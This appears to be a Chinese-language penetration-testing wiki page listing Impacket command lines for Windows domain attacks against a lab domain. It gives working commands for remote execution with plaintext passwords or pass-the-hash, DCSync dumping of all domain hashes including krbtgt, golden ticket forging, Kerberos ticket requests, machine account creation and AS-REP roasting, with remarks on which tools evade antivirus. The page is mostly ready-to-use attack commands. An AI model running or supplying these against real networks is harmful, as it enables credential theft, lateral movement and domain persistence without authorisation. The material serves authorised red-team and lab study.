Impacket

是一款用于处理网络协议的python类的集合。下面介绍Impacket中一些常用脚本的常见用法。

远程连接

以下6个远程连接脚本均可以使用明文密码或密码hash进行远程连接

对于域环境：连接域内普通主机，可以使用普通域用户账户。连接域控，需要域管理员账户（可以是非administrator）
对于工作组环境：vista系统之前的系统，可以使用本地管理员组的用户进行连接。vista以后的系统，只能使用administrator用户去连接，其他用户包括在管理员组内的非administrator用户都不行。

psexec.py

原理
通过管道上传一个二进制文件（随机命名的exe程序）到目标机器的C:\Windows目录下，并在远程目标机器上创建一个服务（随机命名的服务）。通过该服务运行二进制文件，运行结束后删除服务和二进制文件。由于创建和删除服务时会产生大量的日志，因此在攻击溯源时通过日志可以反推攻击流程。该脚本在执行上传的二进制文件时，会被杀毒软件查杀。
利用条件
目标主机开启445端口、IPC$和非IPC$的任意可写共享。默认情况下C$和admin$时开启的
连接

#使用明文密码进行连接
impacket-psexec <administrator:[email protected]8>

#使用密码hash进行连接
impacket-psexec [email protected] -hashes 504f1ff24983db007418099e75c36b94:87dde62120889af6d13e2613f475ac15

smbexec.py

原理
通过文件共享在远程系统中创建服务，将要运行的命令通过服务写在bat文件中执行，然后将执行结果写在文件中来获取执行命令的输出，最后将bat文件、输出文件和服务都删除。
创建和删除服务时会产生大量的日志，因此在攻击溯源时通过日志可以反推攻击流程。windows defender会对其进行查杀，会导致执行不成功。
该脚本默认创建的服务名称为BTOBTO。
利用条件
目标主机开启445端口、IPC$和非IPC$的任意可写共享，可以使用除ipc$共享外的其他所有共享。该脚本默认使用的是C$，可以使用-share参数指定其他的共享。
连接

#使用明文密码进行连接
impacket-smbexec <administrator:[email protected]>

#使用密码hash进行连接
impacket-smbexec [email protected] -hashes 504f1ff24983db007418099e75c36b94:87dde62120889af6d13e2613f475ac15

#使用-share参数指定其他的共享
impacket-smbexec <administrator:[email protected]> -share ADMIN$

wmiexec.py

该脚本主要通过wmi来实现命令执行，在躲避AV查杀方面做的最好

利用条件
目标主机开启135和445端口，并且依赖于admin$。135端口用来执行命令，445端口用来读取回显
连接

#使用明文密码连接
impacket-wmiexec <administrator:[email protected]>

#使用密码hash进行连接
impacket-wmiexec [email protected] -hashes 504f1ff24983db007418099e75c36b94:87dde62120889af6d13e2613f475ac15

atexec.py

通过任务计划服务（task scheduler）来在目标主机上实现命令执行，并返回命令执行后的结果

#使用明文密码执行命令
impacket-atexec <administrator:[email protected]> whoami

#使用密码hash执行命令
impacket-atexec [email protected] whoami -hashes 504f1ff24983db007418099e75c36b94:87dde62120889af6d13e2613f475ac15

dcomexec.py

通过DCOM在目标主机上实现命令执行，并返回命令执行后的输出结果

#使用明文密码执行命令
impacket-dcomexec <administrator:[email protected]> whoami

#使用密码hash执行命令
impacket-dcomexec [email protected] whoami -hashes 504f1ff24983db007418099e75c36b94:87dde62120889af6d13e2613f475ac15

smbclient.py

这个脚本可以向服务器上传文件

连接

impacket-smbclient <administrator:[email protected]>
或者
impacket-smbclient [email protected] -hashes 504f1ff24983db007418099e75c36b94:87dde62120889af6d13e2613f475ac15

![](<https://secure2.wostatic.cn/static/wV8MUxTGi3SpbznPx4RWE9/image.png?auth_key=1694919788-56ogUmLcL9KyepyHXCSbs2-0-ffc6f741f1ea149bbc223afc24c7c068>)

连接成功后的命令

info #查看信息
shares #查看开启的共享
use xx #使用指定的共享
ls #查看当前目录的文件
cd #切换路径
put xx #上传文件
get xx #下载文件

获取域内所有用户的Hash(secretsdump.py)

该脚本是利用DCSync功能导出域内用户的Hash，需要连接的账户和密码具有DCSync权限

获取域内所有用户的hash

impacket-secretsdump <administrator:[email protected]> -just-dc
或者
impacket-secretsdump [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:87dde62120889af6d13e2613f475ac15 -just-dc

使用卷影复制服务导出域内所有Hash

impacket-secretsdump <administrator:[email protected]> -use-vss
或者
impacket-secretsdump [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:87dde62120889af6d13e2613f475ac15 -use-vss

获取域内指定krbtgt用户的hash

impacket-secretsdump <administrator:[email protected]> -just-dc-user krbtgt
或者
impacket-secretsdump [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:87dde62120889af6d13e2613f475ac15 -just-dc-user krbtgt

如果当前导入了管理员的票据，则可以不需要密码直接导出hash

impacket-secretsdump -k -no-pass owa.god.org -dc-ip 10.10.10.158 -just-dc-user administrator

如果是域林，则指定的用户需要加载域前缀

生成黄金票据（ticketer.py）

详见域权限维持与后渗透密码收集

生成黄金票据

impacket-ticketer -domain-sid S-1-5-21-2952760202-1353902439-2381784089 -nthash 58e91a5ac358d86513ab224312314061 -domain god.org administrator

导入票据

export KRB5CCNAME=administrator.ccache

导出administrator用户的hash

impacket-secretsdump -k -no-pass owa.god.org -dc-ip 10.10.10.158 -just-dc-user administrator

请求TGT（getTGT.py）

给定域用户、密码/Hash/AESKey。将请求TGT并保存为.ccache格式的TGT。生成的TGT可用于下一步请求ST。

#使用密码请求TGT
impacket-getTGT god.org/[email protected] -dc-ip 10.10.10.158 -debug

#使用密码hash请求TGT
impacket-getTGT god.org/[email protected] -dc-ip 10.10.10.158 -debug -hashes aad3b435b51404eeaad3b435b51404ee:87dde62120889af6d13e2613f475ac15

请求ST（getST.py）

使用账号密码请求ST

impacket-getST god.org/administrator:Qazx123 -dc-ip 10.10.10.158 -spn cifs/owa.god.org

导入票据

export KRB5CCNAME=administrator.ccache

访问指定服务

impacket-smbexec -k -no-pass owa.god.org

使用TGT生成的票据请求ST的命令：

导入请求的TGT票据

export [email protected]

请求指定SPN的ST

impacket-getST -k -no-pass -spn cifs/owa.god.org -dc-ip 10.10.10.158 god.org/[email protected]

访问指定服务

	impacket-smbexec -k -no-pass owa.god.org

获取域的SID（lookupsid.py）

如果获取了域内任意一个账号密码，可以使用该脚本获得该域的sid值

impacket-lookupsid [email protected] -domain-sid

枚举域用户（samrdump.py）

通过SAMR协议枚举出域内所有用户，使用时需要一个有效的域账号

impacket-samrdump [email protected] -csv

增加机器账户（addcomputer.py）

远程连接域控添加一个机器账户，使用时需要一个有效的域用户。该脚本支持两种方式进行远程创建，SAMR协议及LDAPS协议。

使用SAMR协议创建的机器用户没有SPN，使用LDAPS创建的机器用户具有SPN

使用SAMR协议远程创建一个机器账户machines$，密码为root

impacket-addcomputer -computer-name 'machines$' -computer-pass 'root' -dc-ip 10.10.10.158 'god.org/liukaifeng01:Qazx123' -method SAMR -debug

使用LDAPS协议创建一个机器账户machine$，密码为root

impacket-addcomputer -computer-name 'machine$' -computer-pass 'root' -dc-ip 10.10.10.158 'god.org/liukaifeng01:Qazx123' -method LDAPS -debug

修改密码，只需加上no-add参数

impacket-addcomputer -computer-name 'machines$' -computer-pass 'roots' -dc-ip 10.10.10.158 'god.org/liukaifeng01:Qazx123' -method SAMR -debug -no-add

AS-REP Roasting攻击（GetNPUsers.py）

原理可以参考：域内渗透手法（一）

当在域外时，执行以下命令。自动获取指定user.txt文件中的用户是否设置了“不需要kerberos预身份验证”属性，并获取设置了该属性账户的hash加密的Login session key

impacket-GetNPUsers -dc-ip 10.10.10.158 -usersfile user -format john god.org/

Kerberoasting攻击（GetUserSPNs.py）

原理可以参考：域内渗透手法（一）

具体实现方法，参照上面的文章。

票据转换（ticketConverter.py）

可以将.ccache和.kribi格式的票据进行转换

impacket-ticketConverter [email protected] administrator.kirbi
impacket-ticketConverter administrator.kirbi administrator.ccache

增加、删除和查询SPN（addspn.py）

该脚本可用于增加、删除SPN。但是增加SPN需要域管理员权限，而删除SPN只需要对目标属性有修改的权限即可。

这个脚本在kali中没找到，在最新的Github impacket仓库中也没找到，未复现。

上一页mimikatz 下一页域内渗透手法 Ⅰ

这有帮助吗？